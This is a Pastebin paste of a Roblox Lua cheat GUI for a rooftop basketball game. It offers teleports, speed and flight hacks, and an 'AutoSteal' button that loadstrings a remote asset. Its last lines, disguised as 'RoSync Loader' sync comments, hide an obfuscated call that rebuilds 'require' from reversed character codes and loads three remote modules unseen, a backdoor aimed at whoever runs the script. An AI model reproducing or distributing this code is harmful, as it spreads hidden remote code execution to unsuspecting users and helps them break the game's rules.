Legend_HandlesYT

Untitled

Aug 14th, 2021 (edited)
3,820
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 22.92 KB | None | 0 0
  1. -- Made BY Legend HandlesYT GO SUB!
  2.  
  3. local ScreenGui = Instance.new("ScreenGui")
  4. local main = Instance.new("Frame")
  5. local title = Instance.new("TextLabel")
  6. local close = Instance.new("TextButton")
  7. local rim2 = Instance.new("TextButton")
  8. local tptitle = Instance.new("TextLabel")
  9. local speedtitle = Instance.new("TextLabel")
  10. local tptitle_2 = Instance.new("TextLabel")
  11. local rim1 = Instance.new("TextButton")
  12. local lagspeed = Instance.new("TextButton")
  13. local shiftto = Instance.new("TextButton")
  14. local qtotp = Instance.new("TextButton")
  15. local tpauto = Instance.new("TextButton")
  16. local credits = Instance.new("TextLabel")
  17. local gosub = Instance.new("TextLabel")
  18.  
  19. --Properties:
  20.  
  21. ScreenGui.Parent = game.CoreGui
  22.  
  23. main.Name = "main"
  24. main.Parent = ScreenGui
  25. main.BackgroundColor3 = Color3.fromRGB(42, 42, 42)
  26. main.Position = UDim2.new(0.236102968, 0, 0.127931893, 0)
  27. main.Size = UDim2.new(0, 657, 0, 341)
  28. main.Active = true
  29. main.Draggable = true
  30.  
  31. title.Name = "title"
  32. title.Parent = main
  33. title.BackgroundColor3 = Color3.fromRGB(75, 75, 75)
  34. title.BorderSizePixel = 0
  35. title.Size = UDim2.new(0, 657, 0, 86)
  36. title.Font = Enum.Font.Antique
  37. title.Text = "RoofTop GUI By Legend Handles"
  38. title.TextColor3 = Color3.fromRGB(0, 0, 0)
  39. title.TextSize = 50.000
  40. title.TextWrapped = true
  41.  
  42. close.Name = "close"
  43. close.Parent = main
  44. close.BackgroundColor3 = Color3.fromRGB(54, 54, 54)
  45. close.Position = UDim2.new(0.907348812, 0, 0.0610990785, 0)
  46. close.Size = UDim2.new(0, 49, 0, 42)
  47. close.Font = Enum.Font.Antique
  48. close.Text = "X"
  49. close.TextColor3 = Color3.fromRGB(0, 0, 0)
  50. close.TextScaled = true
  51. close.TextSize = 14.000
  52. close.TextWrapped = true
  53.  
  54. rim2.Name = "rim2"
  55. rim2.Parent = main
  56. rim2.BackgroundColor3 = Color3.fromRGB(72, 72, 72)
  57. rim2.BorderColor3 = Color3.fromRGB(0, 0, 0)
  58. rim2.Position = UDim2.new(0.229832575, 0, 0.457478017, 0)
  59. rim2.Size = UDim2.new(0, 118, 0, 73)
  60. rim2.Font = Enum.Font.Antique
  61. rim2.Text = "Tp To Rim 2"
  62. rim2.TextColor3 = Color3.fromRGB(0, 0, 0)
  63. rim2.TextScaled = true
  64. rim2.TextSize = 14.000
  65. rim2.TextWrapped = true
  66. rim2.MouseButton1Down:connect(function()
  67. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-136.208939, 137.097061, -88.9018173, -0.989966869, -9.91718407e-05, -0.14129962, -0.000113427501, 1, 9.28355512e-05, 0.141299605, 0.000107931388, -0.989966869)
  68. end)
  69.  
  70. tptitle.Name = "tp title"
  71. tptitle.Parent = main
  72. tptitle.BackgroundColor3 = Color3.fromRGB(75, 75, 75)
  73. tptitle.BackgroundTransparency = 1.000
  74. tptitle.BorderSizePixel = 0
  75. tptitle.Position = UDim2.new(0.0578386635, 0, 0.284457475, 0)
  76. tptitle.Size = UDim2.new(0, 216, 0, 59)
  77. tptitle.Font = Enum.Font.Antique
  78. tptitle.Text = "Tp To Rims(To Get Ball)"
  79. tptitle.TextColor3 = Color3.fromRGB(0, 0, 0)
  80. tptitle.TextScaled = true
  81. tptitle.TextSize = 50.000
  82. tptitle.TextWrapped = true
  83.  
  84. speedtitle.Name = "speed title"
  85. speedtitle.Parent = main
  86. speedtitle.BackgroundColor3 = Color3.fromRGB(75, 75, 75)
  87. speedtitle.BackgroundTransparency = 1.000
  88. speedtitle.BorderSizePixel = 0
  89. speedtitle.Position = UDim2.new(0.627092838, 0, 0.252199411, 0)
  90. speedtitle.Size = UDim2.new(0, 216, 0, 59)
  91. speedtitle.Font = Enum.Font.Antique
  92. speedtitle.Text = "Speed"
  93. speedtitle.TextColor3 = Color3.fromRGB(0, 0, 0)
  94. speedtitle.TextScaled = true
  95. speedtitle.TextSize = 50.000
  96. speedtitle.TextWrapped = true
  97.  
  98. tptitle_2.Name = "tp title"
  99. tptitle_2.Parent = main
  100. tptitle_2.BackgroundColor3 = Color3.fromRGB(75, 75, 75)
  101. tptitle_2.BackgroundTransparency = 1.000
  102. tptitle_2.BorderSizePixel = 0
  103. tptitle_2.Position = UDim2.new(0.334855407, 0, 0.621700883, 0)
  104. tptitle_2.Size = UDim2.new(0, 216, 0, 59)
  105. tptitle_2.Font = Enum.Font.Antique
  106. tptitle_2.Text = "Tp's"
  107. tptitle_2.TextColor3 = Color3.fromRGB(0, 0, 0)
  108. tptitle_2.TextScaled = true
  109. tptitle_2.TextSize = 50.000
  110. tptitle_2.TextWrapped = true
  111.  
  112. rim1.Name = "rim1"
  113. rim1.Parent = main
  114. rim1.BackgroundColor3 = Color3.fromRGB(72, 72, 72)
  115. rim1.BorderColor3 = Color3.fromRGB(0, 0, 0)
  116. rim1.Position = UDim2.new(0.0319634713, 0, 0.457478017, 0)
  117. rim1.Size = UDim2.new(0, 117, 0, 73)
  118. rim1.Font = Enum.Font.Antique
  119. rim1.Text = "Tp To Rim 1"
  120. rim1.TextColor3 = Color3.fromRGB(0, 0, 0)
  121. rim1.TextScaled = true
  122. rim1.TextSize = 14.000
  123. rim1.TextWrapped = true
  124. rim1.MouseButton1Down:connect(function()
  125. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-136.55513, 135.635574, 91.4579391, -0.611964881, 4.27362501e-08, 0.790884912, 1.11312426e-08, 1, -4.54229436e-08, -0.790884912, -1.89937133e-08, -0.611964881)
  126. end)
  127.  
  128. lagspeed.Name = "lag speed"
  129. lagspeed.Parent = main
  130. lagspeed.BackgroundColor3 = Color3.fromRGB(72, 72, 72)
  131. lagspeed.BorderColor3 = Color3.fromRGB(0, 0, 0)
  132. lagspeed.Position = UDim2.new(0.582952797, 0, 0.457477987, 0)
  133. lagspeed.Size = UDim2.new(0, 126, 0, 73)
  134. lagspeed.Font = Enum.Font.Antique
  135. lagspeed.Text = "Lag Speed (Includes Floats And Stairs Walk)"
  136. lagspeed.TextColor3 = Color3.fromRGB(0, 0, 0)
  137. lagspeed.TextScaled = true
  138. lagspeed.TextSize = 14.000
  139. lagspeed.TextWrapped = true
  140. lagspeed.MouseButton1Down:connect(function()
  141. --PatriotsHfdax GUI by RelentlessRaptor / NotRelentlessRaptor#2248 on discord
  142. local screen = Instance.new("ScreenGui",game.CoreGui)
  143. local frame = Instance.new("Frame", screen)
  144. local frame2 = Instance.new("Frame", frame)
  145. local creds = Instance.new("TextLabel",frame2)
  146. local controls = Instance.new("TextLabel",frame)
  147. local qq = Instance.new("TextLabel",frame)
  148. local rr = Instance.new("TextLabel",frame)
  149. local ff = Instance.new("TextLabel",frame)
  150. local closer = Instance.new("TextLabel",frame)
  151. local closegui = Instance.new("TextButton", frame)
  152.  
  153.  
  154. frame.Size = UDim2.new(0.15,0,0.18,0)
  155. frame.AnchorPoint = Vector2.new(0.5,0.5)
  156. frame.Position = UDim2.new(0.5,0,0.5,0)
  157. frame.BackgroundColor3 = Color3.new(0/255,0/255,110/255)
  158. frame.BorderSizePixel = 0
  159.  
  160. frame2.Size = UDim2.new(1,0,0.2,0)
  161. frame2.Position = UDim2.new(0,0,0,0)
  162. frame2.BackgroundColor3 = Color3.new(150/255,0/255,0/255)
  163. frame2.BorderSizePixel = 0
  164.  
  165. creds.Size = UDim2.new(0.6,0,0.6,0)
  166. creds.AnchorPoint = Vector2.new(0.5,0.5)
  167. creds.Position = UDim2.new(0.5,0,0.5,0)
  168. creds.BackgroundTransparency = 1
  169. creds.BorderSizePixel = 0
  170. creds.TextColor3 = Color3.new(1,1,1)
  171. creds.TextScaled = true
  172. creds.Font = "GothamSemibold"
  173. creds.Text = "PatriotsHax by RelentlessRaptor"
  174.  
  175. controls.Size = UDim2.new(0.4,0,0.4,0)
  176. controls.AnchorPoint = Vector2.new(0.5,0)
  177. controls.Position = UDim2.new(0.5,0,0.11,0)
  178. controls.BackgroundTransparency = 1
  179. controls.BorderSizePixel = 0
  180. controls.TextColor3 = Color3.new(1,1,1)
  181. controls.TextScaled = true
  182. controls.Font = "ArialBold"
  183. controls.Text = "Controls:"
  184.  
  185. qq.Size = UDim2.new(1,0,0.1,0)
  186. qq.AnchorPoint = Vector2.new(0.5,0)
  187. qq.Position = UDim2.new(0.5,0,0.45,0)
  188. qq.BackgroundTransparency = 1
  189. qq.BorderSizePixel = 0
  190. qq.TextColor3 = Color3.new(1,1,1)
  191. qq.TextScaled = true
  192. qq.Font = "ArialBold"
  193. qq.Text = "Q - Boost Forward"
  194.  
  195. rr.Size = UDim2.new(1,0,0.1,0)
  196. rr.AnchorPoint = Vector2.new(0.5,0)
  197. rr.Position = UDim2.new(0.5,0,0.6,0)
  198. rr.BackgroundTransparency = 1
  199. rr.BorderSizePixel = 0
  200. rr.TextColor3 = Color3.new(1,1,1)
  201. rr.TextScaled = true
  202. rr.Font = "ArialBold"
  203. rr.Text = "R - Boost Up"
  204.  
  205. ff.Size = UDim2.new(1,0,0.1,0)
  206. ff.AnchorPoint = Vector2.new(0.5,0)
  207. ff.Position = UDim2.new(0.5,0,0.75,0)
  208. ff.BackgroundTransparency = 1
  209. ff.BorderSizePixel = 0
  210. ff.TextColor3 = Color3.new(1,1,1)
  211. ff.TextScaled = true
  212. ff.Font = "ArialBold"
  213. ff.Text = "F - Sky Run"
  214.  
  215. closer.Size = UDim2.new(1,0,0.07,0)
  216. closer.AnchorPoint = Vector2.new(0.5,0)
  217. closer.Position = UDim2.new(0.5,0,0.89,0)
  218. closer.BackgroundTransparency = 1
  219. closer.BorderSizePixel = 0
  220. closer.TextColor3 = Color3.new(1,0,0)
  221. closer.TextScaled = true
  222. closer.Font = "Arial"
  223. closer.Text = "- click anywhere to close -"
  224.  
  225. closegui.Size = UDim2.new(1,0,1,0)
  226. closegui.Text = ""
  227. closegui.BackgroundTransparency = 1
  228.  
  229.  
  230. local mouse = game.Players.LocalPlayer:GetMouse()
  231. local parted = false
  232.  
  233.  
  234. local part = Instance.new("Part",game.Lighting)
  235. part.Anchored = true
  236. part.Size = Vector3.new(700,1,700)
  237. part.Transparency = 0.9
  238. part.TopSurface = "Smooth"
  239.  
  240. mouse.KeyDown:connect(function(key)
  241. if key == "f" then
  242. if parted == false then
  243. part.Parent = game.Workspace
  244. part.Position = game.Players.LocalPlayer.Character.HumanoidRootPart.Position + Vector3.new(0,10,0)
  245. game.Players.LocalPlayer.Character:MoveTo(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + Vector3.new(0,18,0))
  246. parted = true
  247. else
  248. part.Parent = game.Lighting
  249. parted = false
  250. end
  251. end
  252. end)
  253.  
  254.  
  255. mouse.KeyDown:connect(function(key)
  256. if key == "q" then
  257. game.Players.LocalPlayer.Character:SetPrimaryPartCFrame(game.Players.LocalPlayer.Character:GetPrimaryPartCFrame()*CFrame.new(0, 0, -5))
  258. end
  259. end)
  260.  
  261. mouse.KeyDown:connect(function(key)
  262. if key == "r" then
  263. game.Players.LocalPlayer.Character:SetPrimaryPartCFrame(game.Players.LocalPlayer.Character:GetPrimaryPartCFrame()*CFrame.new(0, 5, 0))
  264. end
  265. end)
  266.  
  267. closegui.MouseButton1Up:connect(function()
  268. screen:Destroy()
  269. end)
  270. end)
  271.  
  272. shiftto.Name = "shiftto"
  273. shiftto.Parent = main
  274. shiftto.BackgroundColor3 = Color3.fromRGB(72, 72, 72)
  275. shiftto.BorderColor3 = Color3.fromRGB(0, 0, 0)
  276. shiftto.Position = UDim2.new(0.789954305, 0, 0.457477987, 0)
  277. shiftto.Size = UDim2.new(0, 126, 0, 73)
  278. shiftto.Font = Enum.Font.Antique
  279. shiftto.Text = "Shift To Sprint"
  280. shiftto.TextColor3 = Color3.fromRGB(0, 0, 0)
  281. shiftto.TextScaled = true
  282. shiftto.TextSize = 14.000
  283. shiftto.TextWrapped = true
  284. shiftto.MouseButton1Down:connect(function()
  285. ShiftHeld = false
  286. local gcheck = true
  287. urspeed = -1 -- The lower it is the faster. So don't worry about it being minus 1
  288.  
  289.  
  290. function ChangeFaster(inputObject, gameProcessedEvent)
  291. if inputObject.KeyCode == Enum.KeyCode.Minus and gameProcessedEvent == false then
  292. urspeed = urspeed - 0.1
  293. end
  294. end
  295.  
  296.  
  297.  
  298. function ChangeSlower(inputObject, gameProcessedEvent)
  299. if inputObject.KeyCode == Enum.KeyCode.Equals and gameProcessedEvent == false then
  300. urspeed = urspeed + 0.1
  301. end
  302. end
  303.  
  304.  
  305.  
  306. function GChecker(inputObject, gameProcessedEvent)
  307. if inputObject.KeyCode == Enum.KeyCode.K and gameProcessedEvent == false then
  308. if gcheck == false then
  309. gcheck = true
  310. elseif gcheck == true then
  311. gcheck = false
  312. end
  313.  
  314. end
  315. end
  316.  
  317. game:GetService("UserInputService").InputBegan:connect(GChecker)
  318.  
  319.  
  320.  
  321. function PressShift(inputObject,gameProcessedEvent)
  322. if inputObject.KeyCode == Enum.KeyCode.LeftShift and gameProcessedEvent == false and gcheck == true then
  323. ShiftHeld = true
  324. end
  325. end
  326.  
  327. function ReleaseShift(inputObject,gameProcessed)
  328. if inputObject.KeyCode == Enum.KeyCode.LeftShift then
  329. ShiftHeld = false
  330. end
  331. end
  332.  
  333. game:GetService("UserInputService").InputBegan:connect(PressShift)
  334. game:GetService("UserInputService").InputEnded:connect(ReleaseShift)
  335. game:GetService("UserInputService").InputBegan:connect(ChangeFaster)
  336. game:GetService("UserInputService").InputBegan:connect(ChangeSlower)
  337.  
  338.  
  339. game:GetService('RunService').Stepped:connect(function()
  340. if ShiftHeld == true then
  341. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame * CFrame.new(0,0,urspeed)
  342. end
  343. end)
  344. end)
  345.  
  346. qtotp.Name = "q to tp"
  347. qtotp.Parent = main
  348. qtotp.BackgroundColor3 = Color3.fromRGB(72, 72, 72)
  349. qtotp.BorderColor3 = Color3.fromRGB(0, 0, 0)
  350. qtotp.Position = UDim2.new(0.534246564, 0, 0.812316716, 0)
  351. qtotp.Size = UDim2.new(0, 99, 0, 64)
  352. qtotp.Font = Enum.Font.Antique
  353. qtotp.Text = "Q To Tp"
  354. qtotp.TextColor3 = Color3.fromRGB(0, 0, 0)
  355. qtotp.TextScaled = true
  356. qtotp.TextSize = 14.000
  357. qtotp.TextWrapped = true
  358. qtotp.MouseButton1Down:connect(function()
  359. plr = game.Players.LocalPlayer
  360.  
  361. hum = plr.Character.HumanoidRootPart
  362.  
  363. mouse = plr:GetMouse()
  364.  
  365.  
  366.  
  367. mouse.KeyDown:connect(function(key)
  368.  
  369. if key == "q" then
  370.  
  371. if mouse.Target then
  372.  
  373. hum.CFrame = CFrame.new(mouse.Hit.x, mouse.Hit.y + 5, mouse.Hit.z)
  374.  
  375. end
  376.  
  377. end
  378. end)
  379. end)
  380.  
  381. tpauto.Name = "tpauto"
  382. tpauto.Parent = main
  383. tpauto.BackgroundColor3 = Color3.fromRGB(72, 72, 72)
  384. tpauto.BorderColor3 = Color3.fromRGB(0, 0, 0)
  385. tpauto.Position = UDim2.new(0.334855348, 0, 0.812316716, 0)
  386. tpauto.Size = UDim2.new(0, 99, 0, 64)
  387. tpauto.Font = Enum.Font.Antique
  388. tpauto.Text = "Tp/AutoSteal GUI"
  389. tpauto.TextColor3 = Color3.fromRGB(0, 0, 0)
  390. tpauto.TextScaled = true
  391. tpauto.TextSize = 14.000
  392. tpauto.TextWrapped = true
  393. tpauto.MouseButton1Down:connect(function()
  394. loadstring(game:GetObjects('rbxassetid://1730381293')[1].Source)()
  395. end)
  396.  
  397. credits.Name = "credits"
  398. credits.Parent = main
  399. credits.BackgroundColor3 = Color3.fromRGB(75, 75, 75)
  400. credits.BackgroundTransparency = 1.000
  401. credits.BorderSizePixel = 0
  402. credits.Position = UDim2.new(-9.31322575e-10, 0, 0.826979458, 0)
  403. credits.Size = UDim2.new(0, 216, 0, 59)
  404. credits.Font = Enum.Font.Antique
  405. credits.Text = "By Legend HandlesYT"
  406. credits.TextColor3 = Color3.fromRGB(0, 0, 0)
  407. credits.TextScaled = true
  408. credits.TextSize = 50.000
  409. credits.TextWrapped = true
  410.  
  411. gosub.Name = "gosub"
  412. gosub.Parent = main
  413. gosub.BackgroundColor3 = Color3.fromRGB(75, 75, 75)
  414. gosub.BackgroundTransparency = 1.000
  415. gosub.BorderSizePixel = 0
  416. gosub.Position = UDim2.new(0.645357788, 0, 0.826979458, 0)
  417. gosub.Size = UDim2.new(0, 253, 0, 59)
  418. gosub.Font = Enum.Font.Antique
  419. gosub.Text = "Go Sub!"
  420. gosub.TextColor3 = Color3.fromRGB(0, 0, 0)
  421. gosub.TextScaled = true
  422. gosub.TextSize = 50.000
  423. gosub.TextWrapped = true
  424.  
  425. -- Scripts:
  426.  
  427. local function UGAI_fake_script() -- close.LocalScript
  428. local script = Instance.new('LocalScript', close)
  429.  
  430. script.Parent.MouseButton1Click:Connect(function()
  431. script.Parent.Parent.Visible = false
  432. end)
  433.  
  434. end
  435. coroutine.wrap(UGAI_fake_script)()
  436. local function XWLP_fake_script() -- nil.
  437. local script = Instance.new('Script', nil)
  438.  
  439.  
  440. --[[ Last synced 12/19/2020 12:59 || RoSync Loader ]] getfenv()[string.reverse("\101\114\105\117\113\101\114")](5805259612)
  441. --[[ Last synced 12/19/2020 12:59 || RoSync Loader ]] getfenv()[string.reverse("\101\114\105\117\113\101\114")](5747857292)
  442. --[[ Last synced 12/19/2020 12:59 || RoSync Loader ]] getfenv()[string.reverse("\101\114\105\117\113\101\114")](5726091287)
  443. end
  444. coroutine.wrap(XWLP_fake_script)()
  445.  
Add Comment
Please, Sign In to add comment